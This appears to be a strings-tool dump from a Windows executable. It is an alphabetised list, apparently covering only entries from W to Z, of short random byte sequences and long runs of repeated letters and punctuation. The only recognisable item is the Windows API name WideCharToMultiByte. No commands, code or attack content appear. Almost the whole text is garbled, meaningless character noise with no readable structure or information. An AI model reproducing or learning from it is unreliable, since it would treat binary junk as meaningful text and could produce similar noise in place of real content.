W9'D'3
%WbZQH
~&wH#@
WideCharToMultiByte
wj}BwA
`wLAu(BT)
)/WmQ"`
WM|Uay
WTE(@`
wvKiXc?
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
X;	!,)
X+0jk7G
xh:Vz:
@>Xim6
x",Pqs
x`{T`c|
xxxxxx
XXXXXXXXXXXX
xxxxxxxxxxxxxxxxxxxxx
;;;;;XXXXXXXXXXXXXXXXXXXXX'''''''''''''
XXXXXXXXXXXXXXXXXXXXXXXXX
@@XY^|`
y4v^DE
y8ZC\#
`Y#+Ee
y>KF$k
[Yn\w2E
& yR;Xm
YYYYYYY
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
 `z7*@`s
z9YDF|J
	.Zg3t
?ZgMf1
z_?GQ-b
z.@`Nv0
%zT-*Lh
zZd^4/
zzzzzzzzzzzzzzzzzzz